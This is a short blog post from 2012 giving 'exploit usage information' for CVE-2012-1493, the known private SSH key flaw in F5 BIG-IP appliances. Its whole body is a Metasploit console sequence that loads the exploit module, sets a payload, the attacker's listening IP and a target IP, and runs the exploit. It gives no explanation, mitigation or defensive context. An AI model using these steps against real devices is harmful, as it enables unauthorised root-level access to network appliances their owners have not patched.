Tuesday, June 19, 2012

SSH vulnerability CVE-2012-1493

Exploit Usage Information

$ msfconsole

msf > use exploit/linux/ssh/f5_bigip_known_privkey
msf exploit(f5_bigip_known_privkey) > show payloads
msf exploit(f5_bigip_known_privkey) > set PAYLOAD ...
msf exploit(f5_bigip_known_privkey) > set LHOST [MY IP ADDRESS]
msf exploit(f5_bigip_known_privkey) > set RHOST [TARGET IP]
msf exploit(f5_bigip_known_privkey) > exploit

No comments:

Post a Comment